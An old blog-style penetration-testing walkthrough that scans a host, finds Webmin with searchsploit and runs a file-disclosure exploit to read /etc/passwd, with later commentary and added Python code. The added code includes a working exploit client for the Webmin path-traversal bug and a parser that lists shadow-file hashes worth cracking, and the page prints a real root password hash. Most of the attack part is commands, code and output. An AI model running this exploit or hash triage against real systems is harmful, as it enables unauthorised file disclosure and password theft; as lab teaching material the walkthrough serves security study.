Monday, 30 January 2012

Privilege Escalation


1. Scan the target with nmap to gather information:
root@BT:~# nmap -v -A 192.168.0.112

Discovered open port 445/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112

The scan shows five open ports: 22/tcp, 80/tcp, 139/tcp, 445/tcp and 10000/tcp (the usual SSH, HTTP, SMB and Webmin ports), which give us candidates for the next steps. Port 10000/tcp is the default Webmin port, which is why the following steps look for Webmin exploits; we can confirm what is listening by opening http://192.168.0.112:10000 in a web browser.


2. Change to the local Exploit-DB copy shipped with BackTrack:
  root@BT:~# cd /pentest/exploits/exploitdb/

3. List the directory with ls:
  root@BT:/pentest/exploits/exploitdb# ls
  files.csv  platforms  searchsploit

4. Search it for Webmin exploits with ./searchsploit webmin:
  root@BT:/pentest/exploits/exploitdb# ./searchsploit webmin
  Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

5. Copy the Perl version of the arbitrary file disclosure exploit (2017.pl; 1997.php is the same exploit written in PHP) to the home directory:
  root@BT:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~

6. Go back to the home directory with cd:
  root@BT:/pentest/exploits/exploitdb# cd

7. List the home directory to confirm 2017.pl is there:
  root@BT:~# ls
  2017.pl                          NessusReport21.rtf  NessusReport45.rtf  subnet
  Desktop                          NessusReport26.rtf  NessusReport63.rtf  VirtualBox VMs
  download                         NessusReport27.rtf  NessusReport65.rtf  workspace
  galau.ps                         NessusReport32.rtf  NessusReport66.rtf  xpreport.rtf
  galau.txt                        NessusReport35.rtf  NessusReport67.rtf
  IS2C                             NessusReport40.rtf  NessusReport70.rtf
  Nessus-4.4.1-ubuntu910_i386.deb  NessusReport44.rtf  NessusReport.rtf

8. Run 2017.pl without arguments to see its usage. The second run, with only the URL and port, prints the same usage because <filename> and <target> are required as well:
  root@BT:~# perl 2017.pl
  Usage: 2017.pl <url> <port> <filename> <target>
  TARGETS are
  0  - > HTTP
  1  - > HTTPS
  Define full path with file name
  Example: ./webmin.pl blah.com 10000 /etc/passwd
  root@BT:~# perl 2017.pl 192.168.0.112 10000
  Usage: 2017.pl <url> <port> <filename> <target>
  TARGETS are
  0  - > HTTP
  1  - > HTTPS
  Define full path with file name
  Example: ./webmin.pl blah.com 10000 /etc/passwd

9. Read /etc/passwd from the target through the file disclosure bug. Nothing is being decrypted here: on a shadowed system /etc/passwd holds account names, UIDs, home directories and shells, while the password hashes live in /etc/shadow. The last argument, 0, selects plain HTTP as listed in the usage:
root@BT:~# perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking http://192.168.0.112 on port 10000!
FILENAME:  /etc/passwd

FILE CONTENT STARTED
-----------------------------------

-------------------------------------

Note that the FILE CONTENT block is empty: this run did not actually disclose /etc/passwd. A vulnerable Webmin (below 1.290) returns the file's lines between the two rules, starting with root:x:0:0:... Either the target's Webmin is not in the vulnerable range or the request was not served as expected, so the result above is a failed attempt, not a successful read.
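To make the procedure above concrete (scan, pick 2017.pl, run it against port 10000), here is an added example written for this page in Python. It is not the page's own code and not UmZ's 2017.pl. It assumes that 2017.pl uses the publicly documented technique for the Webmin < 1.290 / Usermin < 1.220 disclosure (CVE-2006-3392: a run of `..%01` segments under `/unauthenticated/`, which this page does not spell out), takes the same four arguments in the same order, and it separates request construction and response parsing from the socket code so those parts can be checked offline. The `looks_like_passwd` function is the check that the empty result in step 9 would have failed: a genuine /etc/passwd contains a root line with uid 0. The User-Agent string and the traversal depth of ten are my own choices.

```python
# Added example (not the page's code and not UmZ's 2017.pl): a small Python
# client for the Webmin < 1.290 / Usermin < 1.220 arbitrary file disclosure.
import socket
import ssl
from urllib.parse import urlsplit

# Assumption: the exploit uses the public CVE-2006-3392 path, a run of "..%01"
# segments under /unauthenticated/ that the old miniserv.pl served without
# canonicalising. Ten segments reach / from any realistic Webmin root.
TRAVERSAL_DEPTH = 10
REQUEST_TAG = "webmin-file-disclosure-check"   # assumed User-Agent, our own choice


def build_request(url, port, filename, target):
    """Same argument order as 2017.pl: <url> <port> <filename> <target>,
    target 0 = HTTP, 1 = HTTPS. Returns (use_tls, host, path, request_bytes)."""
    if target not in (0, 1):
        raise ValueError("target must be 0 (HTTP) or 1 (HTTPS)")
    if not filename.startswith("/"):
        raise ValueError("define the full path with file name")
    # Accept "http://192.168.0.112" as well as a bare host, like the Perl script.
    host = urlsplit(url).hostname or url
    path = "/unauthenticated/" + "..%01/" * TRAVERSAL_DEPTH + filename.lstrip("/")
    request = (
        f"GET {path} HTTP/1.0\r\n"
        f"Host: {host}:{port}\r\n"
        f"User-Agent: {REQUEST_TAG}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()
    return bool(target), host, path, request


def split_response(raw):
    """Split a raw HTTP response into (status_code, body_text); (0, "") if it
    is not an HTTP response at all."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return 0, ""
    status = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    code = int(status[1]) if len(status) > 1 and status[1].isdigit() else 0
    return code, body.decode("latin-1")


def passwd_entries(body):
    """Parse passwd(5) text into (user, uid, gid, shell) tuples, ignoring
    anything that is not a 7-field line (HTML error pages, blank lines)."""
    entries = []
    for line in body.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[2].isdigit() and f[3].isdigit():
            entries.append((f[0], int(f[2]), int(f[3]), f[6]))
    return entries


def looks_like_passwd(body):
    """The check step 9 should have passed: a real /etc/passwd has root, uid 0."""
    return any(u == "root" and uid == 0 for u, uid, _, _ in passwd_entries(body))


def fetch(url, port, filename, target, timeout=10):
    """Send the request over a raw socket (TLS when target == 1); returns
    (status_code, body). Needs network access, so it is not run offline."""
    use_tls, host, _, request = build_request(url, port, filename, target)
    sock = socket.create_connection((host, int(port)), timeout=timeout)
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False      # Webmin's certificate is usually self-signed
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return split_response(b"".join(chunks))


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 5:
        sys.exit("Usage: webmin_disclose.py <url> <port> <filename> <target: 0=HTTP 1=HTTPS>")
    code, body = fetch(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]))
    print(f"HTTP {code}, looks like /etc/passwd: {looks_like_passwd(body)}")
    print(body)
```

Invoked as `python3 webmin_disclose.py http://192.168.0.112 10000 /etc/passwd 0` it mirrors the step 9 command; the point of `looks_like_passwd` is that an HTTP 200 with an empty or HTML body means the target is not vulnerable (or the path was canonicalised), and the run should be recorded as a failure rather than a success.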

10. Show the password hashes with cat /etc/shadow. Caveat: the command below is typed at the root@BT prompt, so it lists the shadow file of the attacking BackTrack machine itself (the snort, privoxy, debian-tor and clamav accounts are BackTrack's), not the target's. The target's hashes would have to be pulled through the same Webmin disclosure by passing /etc/shadow as the <filename> argument in step 9, which this page does not show.
root@BT:~# cat /etc/shadow
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
bin:x:15362:0:99999:7:::
sys:x:15362:0:99999:7:::
sync:x:15362:0:99999:7:::
games:x:15362:0:99999:7:::
man:x:15362:0:99999:7:::
lp:x:15362:0:99999:7:::
mail:x:15362:0:99999:7:::
news:x:15362:0:99999:7:::
uucp:x:15362:0:99999:7:::
proxy:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
backup:x:15362:0:99999:7:::
list:x:15362:0:99999:7:::
irc:x:15362:0:99999:7:::
gnats:x:15362:0:99999:7:::
libuuid:x:15362:0:99999:7:::
syslog:x:15362:0:99999:7:::
sshd:x:15362:0:99999:7:::
landscape:x:15362:0:99999:7:::
messagebus:x:15362:0:99999:7:::
nobody:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
snort:*:15362:0:99999:7:::
statd:*:15362:0:99999:7:::
haldaemon:*:15362:0:99999:7:::
kdm:*:15362:0:99999:7:::
festival:*:15362:0:99999:7:::
usbmux:*:15362:0:99999:7:::
postgres:!:15362:0:99999:7:::
privoxy:*:15362:0:99999:7:::
debian-tor:*:15362:0:99999:7:::
clamav:!:15362:0:99999:7:::
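The listing above is worth reading field by field, since only one of those accounts has anything to crack. The following is an added example for this page, not the page's own code: it parses shadow(5) lines, classifies the password field (empty, locked with ! or *, an uncrackable placeholder such as x, or a real crypt string with its algorithm) and decodes the last-change day count. The root, daemon, mysql and avahi lines are taken from the listing above; the legacy, parked and guest lines are constructed with fake hashes to cover cases the listing does not show (md5crypt, a locked account that still carries a hash, and an empty password).

```python
# Added example (not the page's code): classify the entries of a shadow(5)
# listing like the one above and report which ones carry a crackable hash.
from datetime import date, timedelta

# Sample input: root, daemon, mysql and avahi are copied from the BackTrack
# listing above; legacy, parked and guest are constructed (fake hashes).
SHADOW_SAMPLE = """\
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
legacy:$1$Xk3r9aQd$7FwO9ZJZ7Yb9qw8s5GmMv0:15000:0:99999:7:::
parked:!$6$aZ1bC2dE$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmno:15000:0:99999:7:::
guest::15000:0:99999:7:::
"""

CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
DES_ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def classify(field):
    """Return (state, algorithm) for a shadow password field.

    state: 'empty'   no password is required at all
           'locked'  leading ! or * (passwd -l, or never had a password)
           'invalid' nothing crypt(3) produces can match it, e.g. 'x'
           'hashed'  a real crypt string
    algorithm is the crypt scheme whenever a hash is present, including
    locked accounts such as '!$6$...': the lock stops logins, but the hash
    inside is still crackable offline."""
    if field == "":
        return "empty", None
    locked = field[0] in "!*"
    core = field.lstrip("!*")
    algo = None
    if core.startswith("$"):
        parts = core.split("$")             # '', id, salt..., hash
        if len(parts) >= 4 and parts[1]:
            algo = CRYPT_IDS.get(parts[1], "unknown($" + parts[1] + ")")
    elif len(core) == 13 and all(c in DES_ALPHABET for c in core):
        algo = "descrypt"                   # traditional 13-char DES crypt
    if locked:
        return "locked", algo
    return ("hashed", algo) if algo else ("invalid", None)


def parse_shadow(text):
    """Parse shadow lines into dicts; lines without the nine fields are skipped."""
    rows = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 9:
            continue
        state, algo = classify(f[1])
        # field 3 is the last password change as days since 1970-01-01
        changed = None
        if f[2].isdigit():
            changed = (date(1970, 1, 1) + timedelta(days=int(f[2]))).isoformat()
        rows.append({"user": f[0], "state": state, "algo": algo,
                     "last_change": changed,
                     "hash": f[1].lstrip("!*") if algo else None})
    return rows


def crack_candidates(rows):
    """Users whose field holds a real hash: what you would hand to john or
    hashcat. '*', '!' and 'x' fields are not worth cracking; nothing hashes
    to them."""
    return [r["user"] for r in rows if r["algo"] is not None]


if __name__ == "__main__":
    rows = parse_shadow(SHADOW_SAMPLE)
    for r in rows:
        print(f"{r['user']:10} {r['state']:8} {r['algo'] or '-':12} changed {r['last_change']}")
    print("crackable:", crack_candidates(rows))
```

Run against the listing above, only root comes back as a candidate (sha512crypt, last changed 2012-01-23); every other BackTrack system account is locked or carries the x placeholder, so there is nothing to feed to a cracker. The parked line shows the edge case worth remembering: a leading ! disables the login but leaves the hash intact, so a "locked" account can still leak a reusable password.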



